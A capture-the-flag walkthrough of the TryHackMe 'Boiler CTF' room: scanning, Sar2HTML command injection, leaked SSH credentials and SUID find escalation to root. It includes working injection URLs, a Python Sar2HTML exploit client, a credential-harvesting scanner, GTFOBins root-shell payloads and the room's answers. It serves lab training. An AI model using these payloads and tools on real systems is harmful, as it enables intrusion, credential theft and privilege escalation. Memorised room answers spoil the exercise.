In this walkthrough we will go through the Boiler CTF room from TryHackMe. It is a medium-rated box on the platform and demands skills in enumeration, finding public exploits and leveraging basic privilege escalation vectors. Beware of the trolls and rabbit holes the box throws at you. With that said, let's get started.
Machine Info:

| Field | Value |
|---|---|
| Title | Boiler CTF |
| IP address | 10.10.217.53 |
| Difficulty | Medium |
| Objective | Intermediate level CTF. Just enumerate, you'll get there. |
Phase 1 – Enumeration
- First, check whether the machine is live.
- Started with a regular nmap scan, then a full port scan (-p-) to discover services on unusual ports. The default scan (below) found 21 (FTP, vsftpd 3.0.3), 80 (HTTP, Apache 2.4.18) and 10000 (Webmin, MiniServ 1.930), with 53 filtered; the full port scan additionally found 55007, which is SSH on a non-standard port. Note that port 22 is among the closed ports in the default scan, so SSH only listens on 55007.
```
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.217.53
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-13 22:16 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57872 > 10.10.217.53:53 S ttl=37 id=21610 iplen=44 seq=2684070567 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57873 > 10.10.217.53:53 S ttl=58 id=53905 iplen=44 seq=2684005030 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57874 > 10.10.217.53:53 S ttl=53 id=18665 iplen=44 seq=2683939493 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57875 > 10.10.217.53:53 S ttl=57 id=63427 iplen=44 seq=2683873956 win=1024 <mss 1460>
Nmap scan report for 10.10.217.53
Host is up (0.22s latency).
Not shown: 996 closed ports
PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
53/tcp    filtered domain
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
10000/tcp open     http    MiniServ 1.930 (Webmin httpd)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.13 seconds
```
- The FTP server allows anonymous login, and a directory listing reveals a hidden text file, .info.txt, which we download:
```
wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ ftp 10.10.217.53
Connected to 10.10.217.53.
220 (vsFTPd 3.0.3)
Name (10.10.217.53:wh1terose): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (115.2562 kB/s)
ftp> exit
221 Goodbye.
wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$
```
- The note is ROT13-encoded; decoded it reads: "Just wanted to see if you find it. Lol. Remember: Enumeration is the key!" The first of many trolls on this machine.
- Tried to exploit Webmin (MiniServ 1.930) on port 10000, but it failed; the room's Task 1 confirms this service is not the intended way in.
- Ran gobuster against the web server on port 80 and found a Joomla installation under /joomla/.
```
wh1terose@fsociety:~$ gobuster dir -u http://10.10.217.53/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.217.53/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/05/13 22:20:10 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 291]
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess            (Status: 403) [Size: 296]
/index.html           (Status: 200) [Size: 11321]
/joomla               (Status: 301) [Size: 313] [--> http://10.10.217.53/joomla/]
/manual               (Status: 301) [Size: 313] [--> http://10.10.217.53/manual/]
/robots.txt           (Status: 200) [Size: 257]
/server-status        (Status: 403) [Size: 300]
```
- Lots of rabbit holes here.
- Ran gobuster against the /joomla/ directory and found several underscore-prefixed directories (_archive, _database, _files, _test); _test is the interesting one.
```
wh1terose@fsociety:~$ gobuster dir -u http://10.10.217.53/joomla/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.217.53/joomla/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/05/13 22:25:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 298]
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/_archive             (Status: 301) [Size: 322] [--> http://10.10.217.53/joomla/_archive/]
/_database            (Status: 301) [Size: 323] [--> http://10.10.217.53/joomla/_database/]
/_files               (Status: 301) [Size: 320] [--> http://10.10.217.53/joomla/_files/]
/_test                (Status: 301) [Size: 319] [--> http://10.10.217.53/joomla/_test/]
```
- The _test directory hosts a Sar2HTML instance (a web front end for sar system activity reports) at http://10.10.217.53/joomla/_test/index.php. Sar2HTML passes its plot parameter to a shell without sanitising it, so appending ;<command> to the parameter gives OS command execution on the server, and the command's output is reflected in the returned page.
- Reading the log file in that directory through the injected command:
http://10.10.217.53/joomla/_test/index.php?plot=;cat log.txt
- log.txt holds SSH log entries for a login attempt by the user basterd, and the password used is recorded in clear text, which gives us our first credentials.

Creds found:
Username: basterd
Password: superduperp@$$
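As an added example (not part of the original walkthrough), here is a small Python client that wraps the Sar2HTML injection used above. It assumes, as the public Sar2HTML exploit does, that the plot parameter is spliced into a shell command and that the command's output comes back inside option elements of the returned page; the sample HTML is constructed for offline use, not captured from the target, and the function and constant names are my own.

```python
from __future__ import annotations

import html
import re
import urllib.request
from urllib.parse import urlencode

# One <option>...</option> element; the injected command's output is assumed
# to be reflected here, one element per output line.
OPTION_RE = re.compile(r"<option[^>]*>(.*?)</option>", re.IGNORECASE | re.DOTALL)


def build_injection_url(base_url: str, command: str) -> str:
    """Return the request that makes Sar2HTML run `command`.

    The leading ';' terminates whatever the application meant to run, so the
    rest of the value executes as a new shell command.  urlencode() percent-
    encodes the ';' and spaces; PHP decodes them before they reach the
    vulnerable code path, so the payload is unchanged on the server.
    """
    return base_url.rstrip("/") + "/index.php?" + urlencode({"plot": ";" + command})


def extract_output(page: str, skip: int = 0) -> list[str]:
    """Pull the command output back out of the reflected <option> list.

    `skip` drops leading entries that belong to the legitimate drop-down
    (such as a 'Select Host' placeholder) rather than to our command.
    """
    lines = [html.unescape(m.group(1)).strip() for m in OPTION_RE.finditer(page)]
    return [line for line in lines[skip:] if line]


def run(base_url: str, command: str, timeout: float = 10.0) -> list[str]:
    """Live helper: send the request and return the command's output lines."""
    url = build_injection_url(base_url, command)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        page = resp.read().decode("utf-8", errors="replace")
    return extract_output(page, skip=1)


# Constructed response for offline use (not captured from the target): what the
# page might look like after '?plot=;ls -l', with the listing reflected per line.
SAMPLE_PAGE = """<html><body>
<select name="host">
<option value="">Select Host</option>
<option value="total 8">total 8</option>
<option value="-rw-r--r-- 1 www-data www-data 3311 Aug 21  2019 index.php">-rw-r--r-- 1 www-data www-data 3311 Aug 21  2019 index.php</option>
<option value="-rw-r--r-- 1 www-data www-data  712 Aug 21  2019 log.txt">-rw-r--r-- 1 www-data www-data  712 Aug 21  2019 log.txt</option>
</select>
</body></html>
"""

if __name__ == "__main__":
    # Same request as the walkthrough's browser payload, just URL-encoded.
    print(build_injection_url("http://10.10.217.53/joomla/_test", "cat log.txt"))
    for line in extract_output(SAMPLE_PAGE, skip=1):
        print(line)
```

The encoded URL this produces (plot=%3Bcat+log.txt) is equivalent to typing ;cat log.txt into the browser as the walkthrough does; encoding just keeps the request intact through proxies and shell history. Against the live box, run(base_url, "cat log.txt") does the fetch and parse in one step.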
Phase 2 – Exploitation
- Got our initial foothold over SSH on the unusual port 55007 with basterd's credentials (ssh -p 55007 basterd@10.10.217.53). basterd's home directory contains backup.sh, which is worth reading closely:
```
$ cat backup.sh
REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE

if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
        echo "Begining copy of" $i >> $LOG
        scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
        echo $i "completed" >> $LOG

        if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
            rm $SOURCE/$i
            echo $i "removed" >> $LOG
            echo "####################" >> $LOG
        else
            echo "Copy not complete" >> $LOG
            exit 0
        fi
    done
else
    echo "Directory is not present" >> $LOG
    exit 0
fi
$ su stoner
Password:
stoner@Vulnerable:/home/basterd$ cd ..
stoner@Vulnerable:/home$ cd stoner/
stoner@Vulnerable:~$ ls
stoner@Vulnerable:~$ ls -al
total 16
drwxr-x--- 3 stoner stoner 4096 Aug 22  2019 .
drwxr-xr-x 4 root   root   4096 Aug 22  2019 ..
drwxrwxr-x 2 stoner stoner 4096 Aug 22  2019 .nano
-rw-r--r-- 1 stoner stoner   34 Aug 21  2019 .secret
stoner@Vulnerable:~$ cat .secret
You made it till here, well done.
stoner@Vulnerable:~$
```
- stoner's password is hard-coded as a comment directly under USER=stoner in backup.sh (superduperp@$$no1knows), so we switch to that user with su.
- Got the user flag from the hidden .secret file in stoner's home directory.
- The flag text itself is another troll; move on.
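The backup.sh find above is a common pattern: an operator leaves the password for a remote account in a comment next to the username. As an added example (not part of the walkthrough), here is a small Python scanner for that pattern and for secret-looking variable assignments. The detection rules are my own hand-picked heuristics; backup.sh is embedded from the box so the example runs offline, and the second script is constructed to exercise the variable-name rule.

```python
from __future__ import annotations

import re

# backup.sh as read from basterd's home directory (first part), embedded so this runs offline.
BACKUP_SH = r"""REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE
"""

# Constructed script (not from the box) to exercise the variable-name rule.
OTHER_SH = """#!/bin/bash
DB_USER=app
DB_PASSWORD="hunter2!"
mysqldump -u "$DB_USER" -p"$DB_PASSWORD" app > /tmp/app.sql
"""

# Assignments whose variable name suggests a secret (hand-picked list; an assumption).
SECRET_VAR_RE = re.compile(
    r"^\s*(?:export\s+)?([A-Za-z_]*(?:PASS|PASSWD|PASSWORD|PWD|SECRET|TOKEN|API_KEY)[A-Za-z_]*)=(.+)$",
    re.IGNORECASE,
)
# Assignments that tell us whose secret a nearby value belongs to.
USER_VAR_RE = re.compile(r"^\s*(?:export\s+)?[A-Za-z_]*(?:USER|USERNAME|LOGIN)=(\S+)", re.IGNORECASE)
# A '#...' comment, but not a '#!' shebang line.
COMMENT_RE = re.compile(r"^\s*#(?!!)\s*(\S.*)$")


def looks_like_password(value: str) -> bool:
    """Heuristic: a single token of 8+ characters mixing letters with digits or punctuation."""
    value = value.strip().strip("'\"")
    if len(value) < 8 or any(ch.isspace() for ch in value):
        return False
    return any(ch.isalpha() for ch in value) and any(not ch.isalpha() for ch in value)


def find_credentials(script: str) -> list[dict]:
    """Return candidate (user, secret) pairs with the rule and line that produced them."""
    findings: list[dict] = []
    last_user: tuple[str, int] | None = None  # (username, line number it was set on)
    for lineno, line in enumerate(script.splitlines(), start=1):
        m = USER_VAR_RE.match(line)
        if m:
            last_user = (m.group(1), lineno)
            continue
        m = SECRET_VAR_RE.match(line)
        if m:
            findings.append({"line": lineno, "rule": "secret-variable", "name": m.group(1),
                             "user": last_user[0] if last_user else None,
                             "secret": m.group(2).strip().strip("'\"")})
            continue
        m = COMMENT_RE.match(line)
        # The backup.sh pattern: a password-looking comment within two lines of USER=...
        if m and last_user and lineno - last_user[1] <= 2 and looks_like_password(m.group(1)):
            findings.append({"line": lineno, "rule": "comment-after-user", "name": None,
                             "user": last_user[0], "secret": m.group(1).strip()})
    return findings


if __name__ == "__main__":
    for label, script in (("backup.sh", BACKUP_SH), ("other.sh", OTHER_SH)):
        for f in find_credentials(script):
            print(f"{label}:{f['line']} [{f['rule']}] user={f['user']} secret={f['secret']}")
```

Run over backup.sh this reports stoner / superduperp@$$no1knows from the comment rule, which is exactly the su step above; the constructed script shows the assignment rule picking up DB_PASSWORD and pairing it with the DB_USER set just before it. The heuristics are deliberately loose, so review the hits by hand rather than trusting them blindly.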
Phase 3 – Privilege Escalation
- Started with a linpeas scan to discover potential privilege escalation vectors. It turned up the find binary (how fitting for this room) with the SUID bit set and owned by root, so anything find executes runs with root's effective UID. You can confirm it by hand with: find / -perm -4000 -type f 2>/dev/null
- Used the GTFOBins SUID payload for find to spawn a root shell; the -p flag stops bash from dropping the elevated effective UID. GTFOBins adds -quit so find stops after the first match instead of spawning a new shell for every file once you exit. From there we read the root flag.
```
stoner@Vulnerable:/$ find . -exec /bin/bash -p \;
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
It wasn't that hard, was it?
```
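linpeas does this for you, but it is worth seeing the check in isolation. Below is an added example (not from the walkthrough) that enumerates root-owned SUID binaries the way the manual find command above does, and flags the ones GTFOBins lists as giving a shell. The payload table is a small hand-picked subset of GTFOBins' SUID entries and should be treated as an assumption; the file-classification logic is kept free of filesystem access so it can be tested with made-up modes.

```python
from __future__ import annotations

import os
import stat

# Subset of GTFOBins' SUID entries: binary name -> command that keeps the
# elevated effective UID (hand-picked; an assumption, check GTFOBins for the rest).
# `-p` stops bash/sh from dropping euid back to the real uid.
SUID_SHELL_PAYLOADS = {
    "find": "find . -exec /bin/bash -p \\; -quit",
    "bash": "bash -p",
    "env": "env /bin/sh -p",
    "python3": "python3 -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
}

DEFAULT_ROOTS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin")


def is_root_suid(mode: int, uid: int) -> bool:
    """True for a regular file owned by root (uid 0) with the set-user-ID bit (mode 4000)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def assess(path: str, mode: int, uid: int) -> dict | None:
    """Classify one file from its stat data; None unless it is root-SUID.

    'payload' is the GTFOBins shell command when the binary is a known escalation
    path, or None for SUID binaries that are expected (passwd, su, ...) or unknown.
    """
    if not is_root_suid(mode, uid):
        return None
    return {"path": path, "payload": SUID_SHELL_PAYLOADS.get(os.path.basename(path))}


def scan(roots: tuple[str, ...] = DEFAULT_ROOTS) -> list[dict]:
    """Walk the usual binary directories and return every root-SUID regular file."""
    seen: set[str] = set()
    hits: list[dict] = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISLNK(st.st_mode):   # judge the target when we reach it, not the link
                    continue
                real = os.path.realpath(path)  # /bin -> /usr/bin on merged-usr systems
                if real in seen:
                    continue
                seen.add(real)
                finding = assess(path, st.st_mode, st.st_uid)
                if finding:
                    hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan():
        note = f"  <-- shell: {hit['payload']}" if hit["payload"] else ""
        print(hit["path"] + note)
```

On the Boiler box this prints /usr/bin/find with the same payload the walkthrough used. A SUID binary with no payload listed is not automatically safe; it only means it is not in this short table, so check GTFOBins for anything unfamiliar.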
Task 1 – Questions #1
Question 1 – File extension after anon login
txt
Question 2 – What is on the highest port?
SSH
Question 3 – What’s running on port 10000?
webmin
Question 4 – Can you exploit the service running on that port? (yay/nay answer)
nay
Question 5 – What’s CMS can you access?
joomla
Question 6 – Keep enumerating, you’ll know when you find it.
Done
Question 7 – The interesting file name in the folder?
log.txt
Task 2 – Questions #2
Question 1 – Where was the other users pass stored(no extension, just the name)?
backup
Question 2 – user.txt
You made it till here, well done.
Question 3 – What did you exploit to get the privileged user?
find
Question 4 – root.txt
It wasn't that hard, was it?
Conclusion:
So, that was it. Trust me, the "Boiler CTF" room has a lot of rabbit holes and trolls lying around, and you can waste time and energy chasing them. If the enumeration is done properly, though, the real path to the kingdom shows itself. To summarise: we started with a full nmap scan, which revealed four open ports: 21, 80, 10000 and 55007. Port 55007 was the unusual one, running SSH on a non-standard port. We tried to exploit the Webmin service on port 10000, but that failed. Next, gobuster revealed hidden directories under /joomla/, including _test, which hosts a Sar2HTML instance. We exploited the command injection in Sar2HTML to read log.txt and obtained SSH credentials for initial access, and a password hard-coded in backup.sh got us the second user. For privilege escalation, we abused the SUID find binary to spawn a root shell.